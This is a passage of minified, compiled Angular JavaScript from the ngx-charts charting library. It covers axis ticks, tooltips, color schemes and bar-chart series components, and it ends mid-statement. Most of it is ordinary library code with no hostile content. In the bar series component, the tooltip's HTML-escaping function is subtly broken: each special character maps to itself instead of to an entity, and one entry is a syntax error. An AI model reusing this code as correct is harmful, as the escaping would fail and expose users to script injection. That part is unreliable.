gq=(()=>{class t{constructor(e){this.platformId=e,this.tickArguments=[5],this.tickStroke="#ccc",this.trimTicks=!0,this.maxTickLength=16,this.showGridLines=!1,this.showRefLabels=!1,this.showRefLines=!1,this.dimensionsChanged=new Tt,this.innerTickSize=6,this.tickPadding=3,this.verticalSpacing=20,this.textAnchor=km.Middle,this.width=0,this.outerTickSize=6,this.rotateLabels=!1,this.referenceLineLength=0,this.Orientation=Fs}ngOnChanges(e){this.update()}ngAfterViewInit(){setTimeout(()=>this.updateDims())}updateDims(){if(!ag(this.platformId))return this.width=this.getApproximateAxisWidth(),void this.dimensionsChanged.emit({width:this.width});const e=parseInt(this.ticksElement.nativeElement.getBoundingClientRect().width,10);e!==this.width&&(this.width=e,this.dimensionsChanged.emit({width:e}),setTimeout(()=>this.updateDims()))}update(){let e;const i=this.orient===Fs.Top||this.orient===Fs.Right?-1:1;switch(this.tickSpacing=Math.max(this.innerTickSize,0)+this.tickPadding,e=this.scale,this.ticks=this.getTicks(),this.tickFormat=this.tickFormatting?this.tickFormatting:e.tickFormat?e.tickFormat.apply(e,this.tickArguments):function(n){return"Date"===n.constructor.name?n.toLocaleDateString():n.toLocaleString()},this.adjustedScale=e.bandwidth?function(n){return e(n)+.5*e.bandwidth()}:e,this.showRefLines&&this.referenceLines&&this.setReferencelines(),this.orient){case Fs.Top:case Fs.Bottom:this.transform=function(n){return"translate("+this.adjustedScale(n)+",0)"},this.textAnchor=km.Middle,this.y2=this.innerTickSize*i,this.y1=this.tickSpacing*i,this.dy=i<0?"0em":".71em";break;case Fs.Left:this.transform=function(n){return"translate(0,"+this.adjustedScale(n)+")"},this.textAnchor=km.End,this.x2=this.innerTickSize*-i,this.x1=this.tickSpacing*-i,this.dy=".32em";break;case Fs.Right:this.transform=function(n){return"translate(0,"+this.adjustedScale(n)+")"},this.textAnchor=km.Start,this.x2=this.innerTickSize*-i,this.x1=this.tickSpacing*-i,this.dy=".32em"}setTimeout(()=>this.updateDims())}setReferencelines(){this.refMin=this.adjustedScale(Math.min.apply(null,this.referenceLines.map(e=>e.value))),this.refMax=this.adjustedScale(Math.max.apply(null,this.referenceLines.map(e=>e.value))),this.referenceLineLength=this.referenceLines.length,this.referenceAreaPath=wp(0,this.refMax,this.gridLineWidth,this.refMin-this.refMax,0,[!1,!1,!1,!1])}getTicks(){let e;const i=this.getMaxTicks(20),n=this.getMaxTicks(50);return this.tickValues?e=this.tickValues:this.scale.ticks?e=this.scale.ticks.apply(this.scale,[n]):(e=this.scale.domain(),e=pq(e,i)),e}getMaxTicks(e){return Math.floor(this.height/e)}tickTransform(e){return`translate(${this.adjustedScale(e)},${this.verticalSpacing})`}gridLineTransform(){return"translate(5,0)"}tickTrim(e){return this.trimTicks?QI(e,this.maxTickLength):e}getApproximateAxisWidth(){return 7*Math.max(...this.ticks.map(n=>this.tickTrim(this.tickFormat(n)).length))}}return t.\u0275fac=function(e){return new(e||t)(Ee(lm))},t.\u0275cmp=Wt({type:t,selectors:[["g","ngx-charts-y-axis-ticks",""]],viewQuery:function(e,i){if(1&e&&Mi(nq,5),2&e){let n;Vt(n=Bt())&&(i.ticksElement=n.first)}},inputs:{scale:"scale",orient:"orient",tickArguments:"tickArguments",tickValues:"tickValues",tickStroke:"tickStroke",trimTicks:"trimTicks",maxTickLength:"maxTickLength",tickFormatting:"tickFormatting",showGridLines:"showGridLines",gridLineWidth:"gridLineWidth",height:"height",referenceLines:"referenceLines",showRefLabels:"showRefLabels",showRefLines:"showRefLines"},outputs:{dimensionsChanged:"dimensionsChanged"},features:[sa],attrs:bEe,decls:6,vars:4,consts:[["ticksel",""],["class","tick",4,"ngFor","ngForOf"],["class","reference-area",4,"ngIf"],[4,"ngFor","ngForOf"],[1,"tick"],["stroke-width","0.01"],[1,"reference-area"],[4,"ngIf"],["class","gridline-path gridline-path-horizontal","x1","0",4,"ngIf"],["x1","0",1,"gridline-path","gridline-path-horizontal"],["x1","0",1,"refline-path","gridline-path-horizontal"],[1,"refline-label"]],template:function(e,i){1&e&&(fi(),m(0,"g",null,0),ne(2,MEe,5,9,"g",1),u(),ne(3,vEe,1,2,"path",2),ne(4,DEe,2,2,"g",3),ne(5,IEe,2,1,"g",3)),2&e&&(g(2),F("ngForOf",i.ticks),g(1),F("ngIf",i.referenceLineLength>1&&i.refMax&&i.refMin&&i.showRefLines),g(1),F("ngForOf",i.ticks),g(1),F("ngForOf",i.referenceLines))},dependencies:[Zi,Ri],encapsulation:2,changeDetection:0}),t})(),_6e=(()=>{class t{constructor(){this.showGridLines=!1,this.yOrient=Fs.Left,this.yAxisOffset=0,this.dimensionsChanged=new Tt,this.yAxisClassName="y axis",this.labelOffset=15,this.fill="none",this.stroke="#CCC",this.tickStroke="#CCC",this.strokeWidth=1,this.padding=5}ngOnChanges(e){this.update()}update(){this.offset=-(this.yAxisOffset+this.padding),this.yOrient===Fs.Right?(this.labelOffset=65,this.transform=`translate(${this.offset+this.dims.width} , 0)`):(this.offset=this.offset,this.transform=`translate(${this.offset} , 0)`),void 0!==this.yAxisTickCount&&(this.tickArguments=[this.yAxisTickCount])}emitTicksWidth({width:e}){e!==this.labelOffset&&this.yOrient===Fs.Right?(this.labelOffset=e+this.labelOffset,setTimeout(()=>{this.dimensionsChanged.emit({width:e})},0)):e!==this.labelOffset&&(this.labelOffset=e,setTimeout(()=>{this.dimensionsChanged.emit({width:e})},0))}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275cmp=Wt({type:t,selectors:[["g","ngx-charts-y-axis",""]],viewQuery:function(e,i){if(1&e&&Mi(gq,5),2&e){let n;Vt(n=Bt())&&(i.ticksComponent=n.first)}},inputs:{yScale:"yScale",dims:"dims",trimTicks:"trimTicks",maxTickLength:"maxTickLength",tickFormatting:"tickFormatting",ticks:"ticks",showGridLines:"showGridLines",showLabel:"showLabel",labelText:"labelText",yAxisTickCount:"yAxisTickCount",yOrient:"yOrient",referenceLines:"referenceLines",showRefLines:"showRefLines",showRefLabels:"showRefLabels",yAxisOffset:"yAxisOffset"},outputs:{dimensionsChanged:"dimensionsChanged"},features:[sa],attrs:REe,decls:3,vars:4,consts:[["ngx-charts-y-axis-ticks","",3,"trimTicks","maxTickLength","tickFormatting","tickArguments","tickValues","tickStroke","scale","orient","showGridLines","gridLineWidth","referenceLines","showRefLines","showRefLabels","height","dimensionsChanged",4,"ngIf"],["ngx-charts-axis-label","",3,"label","offset","orient","height","width",4,"ngIf"],["ngx-charts-y-axis-ticks","",3,"trimTicks","maxTickLength","tickFormatting","tickArguments","tickValues","tickStroke","scale","orient","showGridLines","gridLineWidth","referenceLines","showRefLines","showRefLabels","height","dimensionsChanged"],["ngx-charts-axis-label","",3,"label","offset","orient","height","width"]],template:function(e,i){1&e&&(fi(),m(0,"g"),ne(1,SEe,1,14,"g",0),ne(2,kEe,1,5,"g",1),u()),2&e&&(Rt("class",i.yAxisClassName)("transform",i.transform),g(1),F("ngIf",i.yScale),g(1),F("ngIf",i.showLabel))},dependencies:[gq,fq,Ri],encapsulation:2,changeDetection:0}),t})(),Cq=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[[rn]]}),t})();var Og=(()=>{return(t=Og||(Og={})).popover="popover",t.tooltip="tooltip",Og;var t})(),Ip=(()=>{return(t=Ip||(Ip={}))[t.all="all"]="all",t[t.focus="focus"]="focus",t[t.mouseover="mouseover"]="mouseover",Ip;var t})();let $I=(()=>{class t{constructor(e,i,n){this.tooltipService=e,this.viewContainerRef=i,this.renderer=n,this.tooltipCssClass="",this.tooltipAppendToBody=!0,this.tooltipSpacing=10,this.tooltipDisabled=!1,this.tooltipShowCaret=!0,this.tooltipPlacement=kn.Top,this.tooltipAlignment=kn.Center,this.tooltipType=Og.popover,this.tooltipCloseOnClickOutside=!0,this.tooltipCloseOnMouseLeave=!0,this.tooltipHideTimeout=300,this.tooltipShowTimeout=100,this.tooltipShowEvent=Ip.all,this.tooltipImmediateExit=!1,this.show=new Tt,this.hide=new Tt}get listensForFocus(){return this.tooltipShowEvent===Ip.all||this.tooltipShowEvent===Ip.focus}get listensForHover(){return this.tooltipShowEvent===Ip.all||this.tooltipShowEvent===Ip.mouseover}ngOnDestroy(){this.hideTooltip(!0)}onFocus(){this.listensForFocus&&this.showTooltip()}onBlur(){this.listensForFocus&&this.hideTooltip(!0)}onMouseEnter(){this.listensForHover&&this.showTooltip()}onMouseLeave(e){if(this.listensForHover&&this.tooltipCloseOnMouseLeave){if(clearTimeout(this.timeout),this.component&&this.component.instance.element.nativeElement.contains(e))return;this.hideTooltip(this.tooltipImmediateExit)}}onMouseClick(){this.listensForHover&&this.hideTooltip(!0)}showTooltip(e){if(this.component||this.tooltipDisabled)return;const i=e?0:this.tooltipShowTimeout+(navigator.userAgent.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/)?300:0);clearTimeout(this.timeout),this.timeout=setTimeout(()=>{this.tooltipService.destroyAll();const n=this.createBoundOptions();this.component=this.tooltipService.create(n),setTimeout(()=>{this.component&&this.addHideListeners(this.component.instance.element.nativeElement)},10),this.show.emit(!0)},i)}addHideListeners(e){this.mouseEnterContentEvent=this.renderer.listen(e,"mouseenter",()=>{clearTimeout(this.timeout)}),this.tooltipCloseOnMouseLeave&&(this.mouseLeaveContentEvent=this.renderer.listen(e,"mouseleave",()=>{this.hideTooltip(this.tooltipImmediateExit)})),this.tooltipCloseOnClickOutside&&(this.documentClickEvent=this.renderer.listen("window","click",i=>{e.contains(i.target)||this.hideTooltip()}))}hideTooltip(e=!1){if(!this.component)return;const i=()=>{this.mouseLeaveContentEvent&&this.mouseLeaveContentEvent(),this.mouseEnterContentEvent&&this.mouseEnterContentEvent(),this.documentClickEvent&&this.documentClickEvent(),this.hide.emit(!0),this.tooltipService.destroy(this.component),this.component=void 0};clearTimeout(this.timeout),e?i():this.timeout=setTimeout(i,this.tooltipHideTimeout)}createBoundOptions(){return{title:this.tooltipTitle,template:this.tooltipTemplate,host:this.viewContainerRef.element,placement:this.tooltipPlacement,alignment:this.tooltipAlignment,type:this.tooltipType,showCaret:this.tooltipShowCaret,cssClass:this.tooltipCssClass,spacing:this.tooltipSpacing,context:this.tooltipContext}}}return t.\u0275fac=function(e){return new(e||t)(Ee(GI),Ee(fo),Ee(wr))},t.\u0275dir=Ot({type:t,selectors:[["","ngx-tooltip",""]],hostBindings:function(e,i){1&e&&he("focusin",function(){return i.onFocus()})("blur",function(){return i.onBlur()})("mouseenter",function(){return i.onMouseEnter()})("mouseleave",function(r){return i.onMouseLeave(r.target)})("click",function(){return i.onMouseClick()})},inputs:{tooltipCssClass:"tooltipCssClass",tooltipTitle:"tooltipTitle",tooltipAppendToBody:"tooltipAppendToBody",tooltipSpacing:"tooltipSpacing",tooltipDisabled:"tooltipDisabled",tooltipShowCaret:"tooltipShowCaret",tooltipPlacement:"tooltipPlacement",tooltipAlignment:"tooltipAlignment",tooltipType:"tooltipType",tooltipCloseOnClickOutside:"tooltipCloseOnClickOutside",tooltipCloseOnMouseLeave:"tooltipCloseOnMouseLeave",tooltipHideTimeout:"tooltipHideTimeout",tooltipShowTimeout:"tooltipShowTimeout",tooltipTemplate:"tooltipTemplate",tooltipShowEvent:"tooltipShowEvent",tooltipContext:"tooltipContext",tooltipImmediateExit:"tooltipImmediateExit"},outputs:{show:"show",hide:"hide"}}),t})(),yq=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[sq,GI],imports:[[rn]]}),t})();const bq={};function qb(){let t=("0000"+(Math.random()*Math.pow(36,4)<<0).toString(36)).slice(-4);return t=`a${t}`,bq[t]?qb():(bq[t]=!0,t)}var as=(()=>{return(t=as||(as={})).Vertical="vertical",t.Horizontal="horizontal",as;var t})();let KI,cT=(()=>{class t{constructor(){this.orientation=as.Vertical}ngOnChanges(e){this.x1="0%",this.x2="0%",this.y1="0%",this.y2="0%",this.orientation===as.Horizontal?this.x2="100%":this.orientation===as.Vertical&&(this.y1="100%")}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275cmp=Wt({type:t,selectors:[["g","ngx-charts-svg-linear-gradient",""]],inputs:{orientation:"orientation",name:"name",stops:"stops"},features:[sa],attrs:PEe,decls:2,vars:6,consts:[[3,"id"],[3,"stop-color","stop-opacity",4,"ngFor","ngForOf"]],template:function(e,i){1&e&&(fi(),m(0,"linearGradient",0),ne(1,OEe,1,5,"stop",1),u()),2&e&&(F("id",i.name),Rt("x1",i.x1)("y1",i.y1)("x2",i.x2)("y2",i.y2),g(1),F("ngForOf",i.stops))},dependencies:[Zi],encapsulation:2,changeDetection:0}),t})();"undefined"!=typeof window?KI=window:"undefined"!=typeof global&&(KI=global);let Vd=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[[rn,Cq,yq],rn,Cq,yq]}),t})(),Dq=[{name:"vivid",selectable:!0,group:Wa.Ordinal,domain:["#647c8a","#3f51b5","#2196f3","#00b862","#afdf0a","#a7b61a","#f3e562","#ff9800","#ff5722","#ff4514"]},{name:"natural",selectable:!0,group:Wa.Ordinal,domain:["#bf9d76","#e99450","#d89f59","#f2dfa7","#a5d7c6","#7794b1","#afafaf","#707160","#ba9383","#d9d5c3"]},{name:"cool",selectable:!0,group:Wa.Ordinal,domain:["#a8385d","#7aa3e5","#a27ea8","#aae3f5","#adcded","#a95963","#8796c0","#7ed3ed","#50abcc","#ad6886"]},{name:"fire",selectable:!0,group:Wa.Ordinal,domain:["#ff3d00","#bf360c","#ff8f00","#ff6f00","#ff5722","#e65100","#ffca28","#ffab00"]},{name:"solar",selectable:!0,group:Wa.Linear,domain:["#fff8e1","#ffecb3","#ffe082","#ffd54f","#ffca28","#ffc107","#ffb300","#ffa000","#ff8f00","#ff6f00"]},{name:"air",selectable:!0,group:Wa.Linear,domain:["#e1f5fe","#b3e5fc","#81d4fa","#4fc3f7","#29b6f6","#03a9f4","#039be5","#0288d1","#0277bd","#01579b"]},{name:"aqua",selectable:!0,group:Wa.Linear,domain:["#e0f7fa","#b2ebf2","#80deea","#4dd0e1","#26c6da","#00bcd4","#00acc1","#0097a7","#00838f","#006064"]},{name:"flame",selectable:!1,group:Wa.Ordinal,domain:["#A10A28","#D3342D","#EF6D49","#FAAD67","#FDDE90","#DBED91","#A9D770","#6CBA67","#2C9653","#146738"]},{name:"ocean",selectable:!1,group:Wa.Ordinal,domain:["#1D68FB","#33C0FC","#4AFFFE","#AFFFFF","#FFFC63","#FDBD2D","#FC8A25","#FA4F1E","#FA141B","#BA38D1"]},{name:"forest",selectable:!1,group:Wa.Ordinal,domain:["#55C22D","#C1F33D","#3CC099","#AFFFFF","#8CFC9D","#76CFFA","#BA60FB","#EE6490","#C42A1C","#FC9F32"]},{name:"horizon",selectable:!1,group:Wa.Ordinal,domain:["#2597FB","#65EBFD","#99FDD0","#FCEE4B","#FEFCFA","#FDD6E3","#FCB1A8","#EF6F7B","#CB96E8","#EFDEE0"]},{name:"neons",selectable:!1,group:Wa.Ordinal,domain:["#FF3333","#FF33FF","#CC33FF","#0000FF","#33CCFF","#33FFFF","#33FF66","#CCFF33","#FFCC00","#FF6600"]},{name:"picnic",selectable:!1,group:Wa.Ordinal,domain:["#FAC51D","#66BD6D","#FAA026","#29BB9C","#E96B56","#55ACD2","#B7332F","#2C83C9","#9166B8","#92E7E8"]},{name:"night",selectable:!1,group:Wa.Ordinal,domain:["#2B1B5A","#501356","#183356","#28203F","#391B3C","#1E2B3C","#120634","#2D0432","#051932","#453080","#75267D","#2C507D","#4B3880","#752F7D","#35547D"]},{name:"nightLights",selectable:!1,group:Wa.Ordinal,domain:["#4e31a5","#9c25a7","#3065ab","#57468b","#904497","#46648b","#32118d","#a00fb3","#1052a2","#6e51bd","#b63cc3","#6c97cb","#8671c1","#b455be","#7496c3"]}];class T6e{constructor(a,e,i,n){"string"==typeof a&&(a=Dq.find(r=>r.name===a)),this.colorDomain=a.domain,this.scaleType=e,this.domain=i,this.customColors=n,this.scale=this.generateColorScheme(a,e,this.domain)}generateColorScheme(a,e,i){let n;switch("string"==typeof a&&(a=Dq.find(r=>r.name===a)),e){case Wa.Quantile:n=iq().range(a.domain).domain(i);break;case Wa.Ordinal:n=qI().range(a.domain).domain(i);break;case Wa.Linear:{const r=[...a.domain];1===r.length&&(r.push(r[0]),this.colorDomain=r);const c=ZU(0,1,1/r.length);n=l2().range(r).domain(c)}}return n}getColor(a){if(null==a)throw new Error("Value can not be null");if(this.scaleType===Wa.Linear){const e=l2().domain(this.domain).range([0,1]);return this.scale(e(a))}{if("function"==typeof this.customColors)return this.customColors(a);const e=a.toString();let i;return this.customColors&&this.customColors.length>0&&(i=this.customColors.find(n=>n.name.toLowerCase()===e.toLowerCase())),i?i.value:this.scale(a)}}getLinearGradientStops(a,e){void 0===e&&(e=this.domain[0]);const i=l2().domain(this.domain).range([0,1]),n=sT().domain(this.colorDomain).range([0,1]),r=this.getColor(a),c=i(e),d=this.getColor(e),T=i(a);let k=1,q=c;const Y=[];for(Y.push({color:d,offset:c,originalOffset:c,opacity:1});q=(T-n.bandwidth()).toFixed(4))break;Y.push({color:te,offset:pe,opacity:1}),q=pe,k++}}if(Y[Y.length-1].offset<100&&Y.push({color:r,offset:T,opacity:1}),T===c)Y[0].offset=0,Y[1].offset=100;else if(100!==Y[Y.length-1].offset)for(const te of Y)te.offset=(te.offset-c)/(T-c)*100;return Y}}let D6e=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[[Vd]]}),t})(),x6e=(()=>{class t{constructor(e){this.roundEdges=!0,this.gradient=!1,this.offset=0,this.isActive=!1,this.animations=!0,this.noBarWhenZero=!0,this.select=new Tt,this.activate=new Tt,this.deactivate=new Tt,this.hasGradient=!1,this.hideBar=!1,this.element=e.nativeElement}ngOnChanges(e){e.roundEdges&&this.loadAnimation(),this.update()}update(){this.gradientId="grad"+qb().toString(),this.gradientFill=`url(#${this.gradientId})`,this.gradient||this.stops?(this.gradientStops=this.getGradient(),this.hasGradient=!0):this.hasGradient=!1,this.updatePathEl(),this.checkToHideBar()}loadAnimation(){this.path=this.getStartingPath(),setTimeout(this.update.bind(this),100)}updatePathEl(){const e=function Wd(t){return"string"==typeof t?new Il([[document.querySelector(t)]],[document.documentElement]):new Il([[t]],vH)}(this.element).select(".bar"),i=this.getPath();this.animations?e.transition().duration(500).attr("d",i):e.attr("d",i)}getGradient(){return this.stops?this.stops:[{offset:0,color:this.fill,opacity:this.getStartOpacity()},{offset:100,color:this.fill,opacity:1}]}getStartingPath(){if(!this.animations)return this.getPath();let i,e=this.getRadius();return this.roundEdges?this.orientation===as.Vertical?(e=Math.min(this.height,e),i=wp(this.x,this.y+this.height,this.width,1,0,this.edges)):this.orientation===as.Horizontal&&(e=Math.min(this.width,e),i=wp(this.x,this.y,1,this.height,0,this.edges)):this.orientation===as.Vertical?i=wp(this.x,this.y+this.height,this.width,1,0,this.edges):this.orientation===as.Horizontal&&(i=wp(this.x,this.y,1,this.height,0,this.edges)),i}getPath(){let i,e=this.getRadius();return this.roundEdges?this.orientation===as.Vertical?(e=Math.min(this.height,e),i=wp(this.x,this.y,this.width,this.height,e,this.edges)):this.orientation===as.Horizontal&&(e=Math.min(this.width,e),i=wp(this.x,this.y,this.width,this.height,e,this.edges)):i=wp(this.x,this.y,this.width,this.height,e,this.edges),i}getRadius(){let e=0;return this.roundEdges&&this.height>5&&this.width>5&&(e=Math.floor(Math.min(5,this.height/2,this.width/2))),e}getStartOpacity(){return this.roundEdges?.2:.5}get edges(){let e=[!1,!1,!1,!1];return this.roundEdges&&(this.orientation===as.Vertical?e=this.data.value>0?[!0,!0,!1,!1]:[!1,!1,!0,!0]:this.orientation===as.Horizontal&&(e=this.data.value>0?[!1,!0,!1,!0]:[!0,!1,!0,!1])),e}onMouseEnter(){this.activate.emit(this.data)}onMouseLeave(){this.deactivate.emit(this.data)}checkToHideBar(){this.hideBar=this.noBarWhenZero&&(this.orientation===as.Vertical&&0===this.height||this.orientation===as.Horizontal&&0===this.width)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi))},t.\u0275cmp=Wt({type:t,selectors:[["g","ngx-charts-bar",""]],hostBindings:function(e,i){1&e&&he("mouseenter",function(){return i.onMouseEnter()})("mouseleave",function(){return i.onMouseLeave()})},inputs:{fill:"fill",data:"data",width:"width",height:"height",x:"x",y:"y",orientation:"orientation",roundEdges:"roundEdges",gradient:"gradient",offset:"offset",isActive:"isActive",stops:"stops",animations:"animations",ariaLabel:"ariaLabel",noBarWhenZero:"noBarWhenZero"},outputs:{select:"select",activate:"activate",deactivate:"deactivate"},features:[sa],attrs:pDe,decls:2,vars:8,consts:[[4,"ngIf"],["stroke","none","role","img","tabIndex","-1",1,"bar",3,"click"],["ngx-charts-svg-linear-gradient","",3,"orientation","name","stops"]],template:function(e,i){1&e&&(ne(0,_De,2,3,"defs",0),fi(),m(1,"path",1),he("click",function(){return i.select.emit(i.data)}),u()),2&e&&(F("ngIf",i.hasGradient),g(1),Ct("active",i.isActive)("hidden",i.hideBar),Rt("d",i.path)("aria-label",i.ariaLabel)("fill",i.hasGradient?i.gradientFill:i.fill))},dependencies:[cT,Ri],encapsulation:2,changeDetection:0}),t})();var Pm=(()=>{return(t=Pm||(Pm={})).Standard="standard",t.Normalized="normalized",t.Stacked="stacked",Pm;var t})(),Rp=(()=>{return(t=Rp||(Rp={})).positive="positive",t.negative="negative",Rp;var t})();let w6e=(()=>{class t{constructor(e){this.dimensionsChanged=new Tt,this.horizontalPadding=2,this.verticalPadding=5,this.element=e.nativeElement}ngOnChanges(e){this.update()}getSize(){return{height:this.element.getBoundingClientRect().height,width:this.element.getBoundingClientRect().width,negative:this.value<0}}ngAfterViewInit(){this.dimensionsChanged.emit(this.getSize())}update(){this.formatedValue=this.valueFormatting?this.valueFormatting(this.value):Ub(this.value),"horizontal"===this.orientation?(this.x=this.barX+this.barWidth,this.value<0?(this.x=this.x-this.horizontalPadding,this.textAnchor="end"):(this.x=this.x+this.horizontalPadding,this.textAnchor="start"),this.y=this.barY+this.barHeight/2):(this.x=this.barX+this.barWidth/2,this.y=this.barY+this.barHeight,this.value<0?(this.y=this.y+this.verticalPadding,this.textAnchor="end"):(this.y=this.y-this.verticalPadding,this.textAnchor="start"),this.transform=`rotate(-45, ${this.x} , ${this.y})`)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi))},t.\u0275cmp=Wt({type:t,selectors:[["g","ngx-charts-bar-label",""]],inputs:{value:"value",valueFormatting:"valueFormatting",barX:"barX",barY:"barY",barWidth:"barWidth",barHeight:"barHeight",orientation:"orientation"},outputs:{dimensionsChanged:"dimensionsChanged"},features:[sa],attrs:gDe,decls:2,vars:5,consts:[["alignment-baseline","middle",1,"textDataLabel"]],template:function(e,i){1&e&&(fi(),m(0,"text",0),s(1),u()),2&e&&(Rt("text-anchor",i.textAnchor)("transform",i.transform)("x",i.x)("y",i.y),g(1),ct(" ",i.formatedValue," "))},styles:[".textDataLabel[_ngcontent-%COMP%]{font-size:11px}"],changeDetection:0}),t})(),I6e=(()=>{class t{constructor(e){this.platformId=e,this.type=Pm.Standard,this.tooltipDisabled=!1,this.animations=!0,this.showDataLabel=!1,this.noBarWhenZero=!0,this.select=new Tt,this.activate=new Tt,this.deactivate=new Tt,this.dataLabelHeightChanged=new Tt,this.barsForDataLabels=[],this.barOrientation=as,this.isSSR=!1}ngOnInit(){Zv(this.platformId)&&(this.isSSR=!0)}ngOnChanges(e){this.update()}update(){let e;this.updateTooltipSettings(),this.series.length&&(e=this.xScale.bandwidth()),e=Math.round(e);const i=Math.max(this.yScale.domain()[0],0),n={[Rp.positive]:0,[Rp.negative]:0};let c,r=Rp.positive;this.type===Pm.Normalized&&(c=this.series.map(d=>d.value).reduce((d,T)=>d+T,0)),this.bars=this.series.map((d,T)=>{let k=d.value;const q=this.getLabel(d),Y=Ub(q);r=k>0?Rp.positive:Rp.negative;const pe={value:k,label:q,roundEdges:this.roundEdges,data:d,width:e,formattedLabel:Y,height:0,x:0,y:0};if(this.type===Pm.Standard)pe.height=Math.abs(this.yScale(k)-this.yScale(i)),pe.x=this.xScale(q),pe.y=this.yScale(k<0?0:k);else if(this.type===Pm.Stacked){const Fe=n[r],Ne=Fe+k;n[r]+=k,pe.height=this.yScale(Fe)-this.yScale(Ne),pe.x=0,pe.y=this.yScale(Ne),pe.offset0=Fe,pe.offset1=Ne}else if(this.type===Pm.Normalized){let Fe=n[r],Ne=Fe+k;n[r]+=k,c>0?(Fe=100*Fe/c,Ne=100*Ne/c):(Fe=0,Ne=0),pe.height=this.yScale(Fe)-this.yScale(Ne),pe.x=0,pe.y=this.yScale(Ne),pe.offset0=Fe,pe.offset1=Ne,k=(Ne-Fe).toFixed(2)+"%"}this.colors.scaleType===Wa.Ordinal?pe.color=this.colors.getColor(q):this.type===Pm.Standard?(pe.color=this.colors.getColor(k),pe.gradientStops=this.colors.getLinearGradientStops(k)):(pe.color=this.colors.getColor(pe.offset1),pe.gradientStops=this.colors.getLinearGradientStops(pe.offset1,pe.offset0));let Re=Y;return pe.ariaLabel=Y+" "+k.toLocaleString(),null!=this.seriesName&&(Re=`${this.seriesName} \u2022 ${Y}`,pe.data.series=this.seriesName,pe.ariaLabel=this.seriesName+" "+pe.ariaLabel),pe.tooltipText=this.tooltipDisabled?void 0:`\n ${function jI(t){return t.toLocaleString().replace(/[&'`"<>]/g,a=>({"&":"&","'":"'","`":"`",'"':""","<":"<",">":">"}[a]))}(Re)}\n ${this.dataLabelFormatting?this.dataLabelFormatting(k):k.toLocaleString()}\n `,pe}),this.updateDataLabels()}updateDataLabels(){if(this.type===Pm.Stacked){this.barsForDataLabels=[];const e={};e.series=this.seriesName;const i=this.series.map(r=>r.value).reduce((r,c)=>c>0?r+c:r,0),n=this.series.map(r=>r.value).reduce((r,c)=>c<0?r+c:r,0);e.total=i+n,e.x=0,e.y=0,e.height=this.yScale(e.total>0?i:n),e.width=this.xScale.bandwidth(),this.barsForDataLabels.push(e)}else this.barsForDataLabels=this.series.map(e=>{var i;const n={};return n.series=null!==(i=this.seriesName)&&void 0!==i?i:e.label,n.total=e.value,n.x=this.xScale(e.label),n.y=this.yScale(0),n.height=this.yScale(n.total)-this.yScale(0),n.width=this.xScale.bandwidth(),n})}updateTooltipSettings(){this.tooltipPlacement=this.tooltipDisabled?void 0:kn.Top,this.tooltipType=this.tooltipDisabled?void 0:Og.tooltip}isActive(e){return!!this.activeEntries&&void 0!==this.activeEntries.find(n=>e.name===n.name&&e.value===n.value)}onClick(e){this.select.emit(e)}getLabel(e){return e.label?e.label:e.name}trackBy(e,i){return i.label}trackDataLabelBy(e,i){return e+"#"+i.series+"#"+i.total}}return t.\u0275fac=function(e){return new(e||t)(Ee(lm))},t.\u0275cmp=Wt({type:t,selectors:[["g","ngx-charts-series-vertical",""]],inputs:{dims:"dims",type:"type",series:"series",xScale:"xScale",yScale:"yScale",colors:"colors",gradient:"gradient",activeEntries:"activeEntries",seriesName:"seriesName",tooltipDisabled:"tooltipDisabled",tooltipTemplate:"tooltipTemplate",roundEdges:"roundEdges",animations:"animations",showDataLabel:"showDataLabel",dataLabelFormatting:"dataLabelFormatting",noBarWhenZero:"noBarWhenZero"},outputs:{select:"select",activate:"activate",deactivate:"deactivate",dataLabelHeightChanged:"dataLabelHeightChanged"},features:[sa],attrs:EDe,decls:3,vars:3,consts:[[4,"ngIf"],["ngx-charts-bar","","ngx-tooltip","",3,"width","height","x","y","fill","stops","data","orientation","roundEdges","gradient","ariaLabel","isActive","tooltipDisabled","tooltipPlacement","tooltipType","tooltipTitle","tooltipTemplate","tooltipContext","noBarWhenZero","animations","select","activate","deactivate",4,"ngFor","ngForOf","ngForTrackBy"],["ngx-charts-bar","","ngx-tooltip","",3,"width","height","x","y","fill","stops","data","orientation","roundEdges","gradient","ariaLabel","isActive","tooltipDisabled","tooltipPlacement","tooltipType","tooltipTitle","tooltipTemplate","tooltipContext","noBarWhenZero","animations","select","activate","deactivate"],["ngx-charts-bar-label","",3,"barX","barY","barWidth","barHeight","value","valueFormatting","orientation","dimensionsChanged",4,"ngFor","ngForOf","ngForTrackBy"],["ngx-charts-bar-label","",3,"barX","barY","barWidth","barHeight","value","valueFormatting","orientation","dimensionsChanged"]],template:function(e,i){1&e&&(ne(0,xDe,2,2,"g",0),ne(1,IDe,2,2,"g",0),ne(2,SDe,2,2,"g",0)),2&e&&(F("ngIf",!i.isSSR),g(1),F("ngIf",i.isSSR),g(1),F("ngIf",i.showDataLabel))},dependencies:[x6e,w6e,Ri,Zi,$I],encapsulation:2,data:{animation:[nr("animationState",[gn(":leave",[zi({opacity:1}),En(500,zi({opacity:0}))])])]},changeDetection:0}),t})(),R6e=(()=>{class t extends hq{constructor(){super(...arguments),this.legend=!1,this.legendTitle="Legend",this.legendPosition=Su.Right,this.tooltipDisabled=!1,this.showGridLines=!0,this.activeEntries=[],this.trimXAxisTicks=!0,this.trimYAxisTicks=!0,this.rotateXAxisTicks=!0,this.maxXAxisTickLength=16,this.maxYAxisTickLength=16,this.barPadding=8,this.roundDomains=!1,this.showDataLabel=!1,this.noBarWhenZero=!0,this.activate=new Tt,this.deactivate=new 